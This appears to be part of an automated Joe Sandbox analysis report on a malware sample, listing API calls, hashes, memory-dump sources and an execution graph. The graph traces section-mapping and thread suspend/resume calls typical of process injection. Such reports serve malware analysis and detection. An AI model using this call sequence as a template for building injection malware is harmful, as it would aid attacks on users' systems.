                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Getcvt____lc_codepage_func____lc_locale_name_func____mb_cur_max_func_localeconv
                                                                                                                        • String ID: false$true
                                                                                                                        • API String ID: 1835574032-2658103896
                                                                                                                        • Opcode ID: 962b0609e3cee0c74323de40bc5197930a452201ea4a4253718b4cb40d28741f
                                                                                                                        • Instruction ID: 33932cea3c9bb95250a1ae94980dc65b2fb271a95edafe8572106c3ab0acd18c
                                                                                                                        • Opcode Fuzzy Hash: 962b0609e3cee0c74323de40bc5197930a452201ea4a4253718b4cb40d28741f
                                                                                                                        • Instruction Fuzzy Hash: 2331A0B2900744AFC720DF55C841BAABBB8FB05710F14866FE895AB781D739AA04CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscmp
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 856254489-711371036
                                                                                                                        • Opcode ID: 51e3aed281588a7acfbb31ede4ca30abccfa29d5f2981b1a56c036e11237a1ee
                                                                                                                        • Instruction ID: 2d1ea498adb3ba63fc6d3bc0f0ace6bc37d15cc290caa85b413ec3043269c666
                                                                                                                        • Opcode Fuzzy Hash: 51e3aed281588a7acfbb31ede4ca30abccfa29d5f2981b1a56c036e11237a1ee
                                                                                                                        • Instruction Fuzzy Hash: A3018036640215B6EB10AA59EC56FE7339C9F04368F444867F908EA2C5FA7CDEC0829D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040163E
                                                                                                                          • Part of subcall function 0040677D: __lock.LIBCMT ref: 0040678E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::___lockstd::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 3308673574-3145022300
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040143E
                                                                                                                          • Part of subcall function 0040677D: __lock.LIBCMT ref: 0040678E
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::___lockstd::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 3308673574-3145022300
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040153E
                                                                                                                          • Part of subcall function 0040677D: __lock.LIBCMT ref: 0040678E
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::___lockstd::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 3308673574-3145022300
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _fgetc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 762172173-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustPointer_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1721217611-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00415B14
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00415B42
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,00000000,00000000,?), ref: 00415B70
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,00000000,00000000,?), ref: 00415BA6
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 00409ACB
                                                                                                                          • Part of subcall function 0040A0ED: ___AdjustPointer.LIBCMT ref: 0040A136
                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00409AE2
                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 00409AF4
                                                                                                                        • CallCatchBlock.LIBCMT ref: 00409B18
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2633735394-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3016257755-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 004102BE
                                                                                                                          • Part of subcall function 00409657: __mtinitlocknum.LIBCMT ref: 00409669
                                                                                                                          • Part of subcall function 00409657: EnterCriticalSection.KERNEL32(00000000,?,004102C3,0000000D), ref: 00409682
                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 004102CB
                                                                                                                        • __lock.LIBCMT ref: 004102DF
                                                                                                                        • ___addlocaleref.LIBCMT ref: 004102FD
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1687444384-0
                                                                                                                        • Opcode ID: 1f200a260491d72330b6d2cb47b2950cffcd587b9a9effd7ba43696811beccdd
                                                                                                                        • Instruction ID: 18857926dce3371e009c2d52e2dc5d0b2a7b6d965f972cefbd74dc7357e23b08
                                                                                                                        • Opcode Fuzzy Hash: 1f200a260491d72330b6d2cb47b2950cffcd587b9a9effd7ba43696811beccdd
                                                                                                                        • Instruction Fuzzy Hash: C9016171500B00DFD7209F66D805789B7F0AF54325F20891FE4AA963E1CBB8AA84CB09
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004028F0: _memmove.LIBCMT ref: 004029BE
                                                                                                                        • _memmove.LIBCMT ref: 0040519C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                        • Opcode ID: 561e0ee8829434c9549f81183fb6b4215faafa5ba0da433c924ced4df5dbb528
                                                                                                                        • Instruction ID: 35a9fb9f3f02b229400c85453a10d2f0da0fe7547ae8a4d99f5b113dbeb1a559
                                                                                                                        • Opcode Fuzzy Hash: 561e0ee8829434c9549f81183fb6b4215faafa5ba0da433c924ced4df5dbb528
                                                                                                                        • Instruction Fuzzy Hash: 9F318F327006049BD7249E1CD880B5BB7AAEF91714B608A3FE551EF2C1CB79D9418BA8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?), ref: 00416238
                                                                                                                        • _free.LIBCMT ref: 0041626B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide_free
                                                                                                                        • String ID: VWj
                                                                                                                        • API String ID: 3242298965-3488467141
                                                                                                                        • Opcode ID: 1ecdfe88422f94fd532258db9d154171434ab07853eecb01cc71287c4fb9c655
                                                                                                                        • Instruction ID: 5923012caadd374d5684bfada8950495edb10755a258a388a5eb54e0f84a2d30
                                                                                                                        • Opcode Fuzzy Hash: 1ecdfe88422f94fd532258db9d154171434ab07853eecb01cc71287c4fb9c655
                                                                                                                        • Instruction Fuzzy Hash: 51110A35B001409FC721CFADD8C48DE7FB2AB9531473A459AE895DB346C635D842CB54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401FEC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$pA
                                                                                                                        • API String ID: 2005118841-3406655481
                                                                                                                        • Opcode ID: 3e73dbd9d68a69327fbb4684fa7b7da57cc62c3f6abbd682cfcba3fa557ddabb
                                                                                                                        • Instruction ID: c8fda5f9fe7043d11bc572f67169b0b8b833b586247de635247e3ecd103ffe97
                                                                                                                        • Opcode Fuzzy Hash: 3e73dbd9d68a69327fbb4684fa7b7da57cc62c3f6abbd682cfcba3fa557ddabb
                                                                                                                        • Instruction Fuzzy Hash: F8117071A002069FEB14CF58C585B69B7B0BF40358F64C17AE615AB2D2C7B9ED81CB48
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040591A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$pA
                                                                                                                        • API String ID: 2005118841-3406655481
                                                                                                                        • Opcode ID: 2e217378032a6f0d1a20d01c2c4da4da847a5952c93a0a3391aa4feea563daa9
                                                                                                                        • Instruction ID: 0419535567d013a683a9a16403f1a62f48201a5c2d5247e63aab9edf8040a06e
                                                                                                                        • Opcode Fuzzy Hash: 2e217378032a6f0d1a20d01c2c4da4da847a5952c93a0a3391aa4feea563daa9
                                                                                                                        • Instruction Fuzzy Hash: A71151B1A00606CFEB04DF58C481B5AB3B0FB44328F64C56AE515AB282C778D955CF58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?), ref: 00416238
                                                                                                                        • _free.LIBCMT ref: 0041626B
                                                                                                                          • Part of subcall function 00407AE6: HeapFree.KERNEL32(00000000,00000000,?,0041026B,00000000,00000001,00000000,?,?,?,004087B6,00406914,00000000), ref: 00407AFA
                                                                                                                          • Part of subcall function 00407AE6: GetLastError.KERNEL32(00000000,?,0041026B,00000000,00000001,00000000,?,?,?,004087B6,00406914,00000000), ref: 00407B0C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharErrorFreeHeapLastMultiWide_free
                                                                                                                        • String ID: VWj
                                                                                                                        • API String ID: 603669072-3488467141
                                                                                                                        • Opcode ID: 5202277449832971603c87f80990f66ca3f7f776ba10bd22c8735ea133f22ffa
                                                                                                                        • Instruction ID: 5ba66fdf6855539c92f8454dfe1a2cc4dc6058e36318942371d6dc00c7a57d3b
                                                                                                                        • Opcode Fuzzy Hash: 5202277449832971603c87f80990f66ca3f7f776ba10bd22c8735ea133f22ffa
                                                                                                                        • Instruction Fuzzy Hash: A3F0FC367001149BCB209F5DE8C5CDE77B6BFC4320B264526F824EB380CA34DC818B54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __FF_MSGBANNER.LIBCMT ref: 0040DCF4
                                                                                                                          • Part of subcall function 0040D7CA: __NMSG_WRITE.LIBCMT ref: 0040D7F1
                                                                                                                          • Part of subcall function 0040D7CA: __NMSG_WRITE.LIBCMT ref: 0040D7FB
                                                                                                                        • __NMSG_WRITE.LIBCMT ref: 0040DCFC
                                                                                                                          • Part of subcall function 0040D827: GetModuleFileNameW.KERNEL32(00000000,0042A62A,00000104,?,00000001,00000000), ref: 0040D8B9
                                                                                                                          • Part of subcall function 0040D827: ___crtMessageBoxW.LIBCMT ref: 0040D967
                                                                                                                          • Part of subcall function 0040DDBC: _doexit.LIBCMT ref: 0040DDC6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileMessageModuleName___crt_doexit
                                                                                                                        • String ID: EUA
                                                                                                                        • API String ID: 288729343-1325878830
                                                                                                                        • Opcode ID: 4add77ddc967bf1f1939d45f323dbfaa7e7fda842892029aff83f61113827601
                                                                                                                        • Instruction ID: 71dbc6ad582759cbadfd251b6f59fae28df03b1ed6edf287d547cd0b1cd3e64a
                                                                                                                        • Opcode Fuzzy Hash: 4add77ddc967bf1f1939d45f323dbfaa7e7fda842892029aff83f61113827601
                                                                                                                        • Instruction Fuzzy Hash: 27B0922185024D6AE5843BF78C07A683628AF00B2EF50503E7634294D79EB868881099
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:1.2%
                                                                                                                        Dynamic/Decrypted Code Coverage:1.7%
                                                                                                                        Signature Coverage:10.7%
                                                                                                                        Total number of Nodes:410
                                                                                                                        Total number of Limit Nodes:40
40b393 96701->96704 96703 427a62 96703->96627 96706 40b3b8 96704->96706 96705 40b4d5 NtDelayExecution 96707 40b4f1 96705->96707 96706->96705 96707->96703 96711 40a4a8 96708->96711 96709 40a5c5 NtResumeThread 96710 40a5e0 96709->96710 96710->96636 96711->96709 96712 428143 96713 428161 96712->96713 96714 4281ba 96712->96714 96716 4293b3 LdrLoadDll 96713->96716 96715 4293b3 LdrLoadDll 96714->96715 96717 4281d0 96715->96717 96718 42817e 96716->96718 96721 40acf3 96718->96721 96720 4281b3 96724 40ad18 96721->96724 96722 40ae35 NtCreateFile 96723 40ae74 96722->96723 96723->96720 96724->96722 96725 423903 96726 42391f 96725->96726 96737 4280a3 96726->96737 96729 423947 96731 4283b3 2 API calls 96729->96731 96730 42395b 96732 4283b3 2 API calls 96730->96732 96733 423950 96731->96733 96734 423964 96732->96734 96741 42a2e3 LdrLoadDll RtlAllocateHeap 96734->96741 96736 42396f 96738 4280c0 96737->96738 96739 4293b3 LdrLoadDll 96738->96739 96740 423940 96739->96740 96740->96729 96740->96730 96741->96736 96742 42b2a3 96743 42b2b3 96742->96743 96744 42b2b9 96742->96744 96747 42a2a3 96744->96747 96746 42b2df 96750 428663 96747->96750 96749 42a2be 96749->96746 96751 428680 96750->96751 96752 4293b3 LdrLoadDll 96751->96752 96753 428691 RtlAllocateHeap 96752->96753 96753->96749 96834 428273 96835 428294 96834->96835 96836 4282e5 96834->96836 96838 4293b3 LdrLoadDll 96835->96838 96837 4293b3 LdrLoadDll 96836->96837 96839 4282fb 96837->96839 96840 4282b1 96838->96840 96843 40af23 96840->96843 96842 4282de 96846 40af48 96843->96846 96844 40b065 NtReadFile 96845 40b09c 96844->96845 96845->96842 96846->96844 96847 423c93 96851 423ca2 96847->96851 96848 423d2f 96849 423ce9 96850 42a1c3 2 API calls 96849->96850 96852 423cf9 96850->96852 96851->96848 96851->96849 96853 423d2a 96851->96853 96854 42a1c3 2 API calls 96853->96854 96854->96848 96754 413bc3 96755 413bdd 96754->96755 96762 4173a3 96755->96762 96757 413bfb 96758 423da3 LdrLoadDll 96757->96758 96759 413c11 96758->96759 96760 413c40 
96759->96760 96761 413c2f PostThreadMessageW 96759->96761 96761->96760 96763 4173c7 96762->96763 96764 417403 LdrLoadDll 96763->96764 96765 4173ce 96763->96765 96764->96765 96765->96757 96766 419c83 96767 419c9b 96766->96767 96771 419cf5 96766->96771 96767->96771 96772 41d323 LdrLoadDll 96767->96772 96769 419cdf 96769->96771 96773 41d5b3 96769->96773 96772->96769 96774 41d5d9 96773->96774 96775 423da3 LdrLoadDll 96774->96775 96777 41d62d 96775->96777 96776 41d99d 96776->96771 96777->96776 96820 428743 LdrLoadDll 96777->96820 96779 41d67e 96780 41d985 96779->96780 96821 42b3d3 96779->96821 96781 42a1c3 2 API calls 96780->96781 96781->96776 96783 41d69a 96783->96780 96784 41d7a0 96783->96784 96785 427ae3 2 API calls 96783->96785 96827 4186c3 LdrLoadDll LdrInitializeThunk 96784->96827 96786 41d721 96785->96786 96786->96784 96788 41d729 96786->96788 96788->96776 96790 41d786 96788->96790 96791 41d755 96788->96791 96828 4185c3 NtMapViewOfSection LdrLoadDll 96788->96828 96789 41d7cb 96789->96780 96792 41d7fd 96789->96792 96830 4185c3 NtMapViewOfSection LdrLoadDll 96789->96830 96793 42a1c3 2 API calls 96790->96793 96796 4283b3 2 API calls 96791->96796 96800 41d964 96792->96800 96801 41d82d 96792->96801 96797 41d796 96793->96797 96798 41d765 96796->96798 96797->96771 96829 4258d3 NtDelayExecution LdrLoadDll 96798->96829 96803 42a1c3 2 API calls 96800->96803 96831 428443 LdrLoadDll 96801->96831 96804 41d97b 96803->96804 96804->96771 96805 41d84c 96806 41a403 3 API calls 96805->96806 96807 41d8b5 96806->96807 96807->96780 96808 41d8c0 96807->96808 96809 42a1c3 2 API calls 96808->96809 96810 41d8e4 96809->96810 96832 427d43 LdrLoadDll 96810->96832 96812 41d8f8 96813 427c83 2 API calls 96812->96813 96814 41d91f 96813->96814 96815 41d926 96814->96815 96833 427d43 LdrLoadDll 96814->96833 96815->96771 96817 41d94c 96818 4278f3 2 API calls 96817->96818 96819 41d95a 96818->96819 96819->96771 96820->96779 96822 42b343 96821->96822 96823 42a2a3 2 API calls 96822->96823 96824 42b3a0 
96822->96824 96825 42b37d 96823->96825 96824->96783 96826 42a1c3 2 API calls 96825->96826 96826->96824 96827->96789 96828->96791 96829->96790 96830->96792 96831->96805 96832->96812 96833->96817 96855 41a553 96863 4276e3 96855->96863 96857 41a597 96862 41a5b8 96857->96862 96870 427873 96857->96870 96859 41a5a8 96860 41a5c4 96859->96860 96861 4283b3 2 API calls 96859->96861 96861->96862 96864 42773e 96863->96864 96865 427701 96863->96865 96867 4293b3 LdrLoadDll 96864->96867 96866 4293b3 LdrLoadDll 96865->96866 96869 42771e 96866->96869 96868 427754 96867->96868 96868->96857 96869->96857 96871 427891 96870->96871 96872 4278c6 96870->96872 96873 4293b3 LdrLoadDll 96871->96873 96874 4293b3 LdrLoadDll 96872->96874 96875 4278ae 96873->96875 96876 4278dc 96874->96876 96879 409e53 96875->96879 96876->96859 96878 4278bf 96878->96859 96881 409e78 96879->96881 96880 409f95 NtSuspendThread 96882 409fb0 96880->96882 96881->96880 96882->96878 96883 b92b60 LdrInitializeThunk 96884 418598 96885 4283b3 2 API calls 96884->96885 96886 4185a2 96885->96886

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,to@,?,?,?,00000000), ref: 0040AC2D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: SectionView
                                                                                                                        • String ID: to@$to@
                                                                                                                        • API String ID: 1323581903-3423273117
                                                                                                                        • Opcode ID: 676d8c6312eacfc3e320d3e475f7c7686042c1811537bcf82107781b5a2d1997
                                                                                                                        • Instruction ID: 88c6af07cecda7dc52f2954e71423d245eb0154dddc4a1c440b087aa91dd83bd
                                                                                                                        • Opcode Fuzzy Hash: 676d8c6312eacfc3e320d3e475f7c7686042c1811537bcf82107781b5a2d1997
                                                                                                                        • Instruction Fuzzy Hash: 2F714CB1E04258DFCB04CFA9C490AEDBBF2AF8D304F18816AE459B7341D638A951CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,1o@,00000000,?,?,08000000), ref: 0040AA01
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateSection
                                                                                                                        • String ID: 1o@
                                                                                                                        • API String ID: 2449625523-1313955917
                                                                                                                        • Opcode ID: c295ff44140c6a2b0e6634bd6207f40f99ab8758f9ee6ce411b7e9a0f5b707be
                                                                                                                        • Instruction ID: 28a81098a72d725d87d8893a00b6b3592a645c596d15c3f0b08f8818d347be54
                                                                                                                        • Opcode Fuzzy Hash: c295ff44140c6a2b0e6634bd6207f40f99ab8758f9ee6ce411b7e9a0f5b707be
                                                                                                                        • Instruction Fuzzy Hash: 60714CB1E04258DFCB04CFA9C591AEDBBF1AF89304F18806AE459B7381D638A952CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040AE61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 731e3f6e8ba2e523611b6b9351a583bbb6b3e0c411d973996869ef3de7769258
                                                                                                                        • Instruction ID: c6ec39a31f4d8b50fe65f8e64631f8413f779835fbb3720df3a48058bcedeb27
                                                                                                                        • Opcode Fuzzy Hash: 731e3f6e8ba2e523611b6b9351a583bbb6b3e0c411d973996869ef3de7769258
                                                                                                                        • Instruction Fuzzy Hash: 1C815FB1E04258DFCB04CFA9C490AEDBBF5AF8D304F18816AE459B7341D638A952CF95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040B089
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
